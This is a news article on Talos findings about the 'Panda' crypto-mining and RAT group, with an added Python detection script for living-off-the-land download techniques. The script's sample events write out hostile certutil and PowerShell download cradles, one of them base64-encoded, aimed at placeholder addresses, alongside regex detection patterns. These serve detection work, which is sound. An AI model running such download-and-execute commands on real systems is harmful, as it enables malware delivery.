‘Panda’ Group Makes Thousands of Dollars Using RATs, Crypto-Miners

A new threat actor has generated thousands of dollars in the Monero cryptocurrency using remote access tools (RATs) and illicit cryptocurrency mining malware, Cisco’s Talos threat intelligence and research group revealed on Tuesday.

Although not highly sophisticated, the actor, which Talos refers to as Panda, is highly active and focused on persistently exploiting vulnerable web applications worldwide. Its tooling allows it to move laterally across compromised networks, and its use of RATs also puts organizations at risk of data theft.

The group is capable of updating its infrastructure and exploits on the fly, and relies on exploits released by the Shadow Brokers for infiltration, as well as on the open-source credential-dumping tool Mimikatz.

Initially associated with last year’s MassMiner campaign, the threat actor was shortly after linked to another widespread mining campaign that used a different set of command and control (C&C) servers. Panda has since updated not only the infrastructure, but also its portfolio of exploits and payloads.

The cybercriminals, Talos’ security researchers say, have been observed targeting organizations in multiple industries, including those in the banking, healthcare, transportation, telecommunications, and IT services sectors.

In July 2018, the actor was exploiting an Oracle WebLogic vulnerability (CVE-2017-10271) to drop a miner associated with MassMiner. The hackers were mass-scanning for vulnerable servers and also attempted to exploit an Apache Struts 2 vulnerability (CVE-2017-5638). The exploit delivered a PowerShell command that downloaded the miner payload.

“In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000,” Talos says.

Panda was also observed using Gh0st RAT and dropping other hacking tools and exploits, including Mimikatz and exploits that the Shadow Brokers are said to have stolen from the National Security Agency (NSA).

Talos researchers spotted elements of the MassMiner attacks being used in a campaign that employed a different C&C server, suggesting that the same actor might have been behind both.

In January 2019, the threat actor was exploiting a flaw in the ThinkPHP web framework (CNVD-2018-24942) to spread similar malware. In March 2019, it was using new infrastructure, although the tactics, techniques, and procedures (TTPs) remained similar.

Soon after, Panda started employing an updated payload, which used the Windows Certutil utility to download the secondary miner payload. Exploit modules designed for lateral movement were still in use, many of them derived from the leaked NSA exploits.
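The two downloader techniques described above (a PowerShell command fetching the miner after web-application exploitation, and Certutil pulling the second-stage payload) are living-off-the-land patterns that a defender can hunt for in process-creation telemetry. The following is an added detection example, not code from Talos, SecurityWeek or the actor: it runs three rules over Sysmon Event ID 1-style records (Image, CommandLine, ParentImage). The web-application parent names (java.exe for WebLogic and Struts, php-cgi.exe for ThinkPHP, and so on), the sample events and the TEST-NET addresses are assumptions constructed for the example, not indicators from the report.

```python
"""Detection example for the living-off-the-land download techniques the
article attributes to Panda (PowerShell downloader, certutil.exe fetching a
second-stage miner) and for a web-application process spawning a shell after
exploitation. Added illustration, not code from Talos or from the actor.

Records use Sysmon Event ID 1 (process creation) field names: Image,
CommandLine, ParentImage. The sample events below are constructed here."""
import base64
import re

# Assumed binary names for the web-application hosts named in the article
# (WebLogic/Struts run on Java, ThinkPHP on PHP); extend for your estate.
WEB_APP_PARENTS = {"java.exe", "php-cgi.exe", "php.exe", "httpd.exe", "w3wp.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "mshta.exe", "wscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Download primitives commonly seen in PowerShell one-liners.
PS_CRADLE = re.compile(
    r"DownloadString|DownloadFile|DownloadData|Net\.WebClient|"
    r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|Start-BitsTransfer",
    re.IGNORECASE,
)
# -e / -ec / -enc / -EncodedCommand <base64 of a UTF-16LE script>
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path (accepts / and \\ separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="ignore")
    except ValueError:
        return None


def analyze(event: dict) -> list:
    """Rule names that fire on one process-creation event (empty if nothing matched)."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    hits = []

    # certutil as a downloader: -urlcache together with a URL on the command line.
    if image == "certutil.exe" and "-urlcache" in cmdline.lower() and "://" in cmdline:
        hits.append("certutil_download")

    # PowerShell cradle; decode -EncodedCommand so base64 does not hide it.
    if image in POWERSHELL:
        decoded = decode_encoded_command(cmdline)
        if PS_CRADLE.search(cmdline + "\n" + (decoded or "")):
            hits.append("powershell_download_cradle" + ("_encoded" if decoded else ""))

    # Web-application server spawning a shell: the post-exploitation hand-off.
    if parent in WEB_APP_PARENTS and image in SHELLS:
        hits.append("webapp_spawned_shell")
    return hits


def scan(events: list) -> list:
    """Events that triggered at least one rule, with the rule names."""
    out = []
    for i, ev in enumerate(events):
        rules = analyze(ev)
        if rules:
            out.append({"index": i, "image": basename(ev.get("Image", "")), "rules": rules})
    return out


# Constructed sample events (TEST-NET addresses; not indicators from the report).
_ENCODED = base64.b64encode(
    "(New-Object Net.WebClient).DownloadFile('http://198.51.100.7/x.exe','C:\\Users\\Public\\x.exe')"
    .encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/update.exe C:\\Users\\Public\\svchost.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')\"",
     "ParentImage": r"C:\Oracle\Middleware\jdk\bin\java.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -Enc " + _ENCODED,
     "ParentImage": r"C:\php\php-cgi.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify cert.cer",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit)
```

The first two sample events fire as expected, the encoded third event is caught only because the -EncodedCommand argument is decoded before matching, and the legitimate certutil -verify and cmd.exe invocations produce no alerts. In production the parent-process rule is the one with the best signal-to-noise ratio for the web-application exploitation the article describes, since a Java or PHP worker process has little legitimate reason to launch PowerShell or Certutil.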

Over the past month, Panda has updated its C&C and payload-hosting infrastructure, but the employed malware remains relatively similar to what was used in May 2019. In August, the hackers added another set of domains to their inventory, the researchers say.

“Panda’s operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated,” Talos concludes.

Related: MassMiner Attacks Web Servers With Multiple Exploits

Related: Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism

Written By

Ionut Arghire is an international correspondent for SecurityWeek.
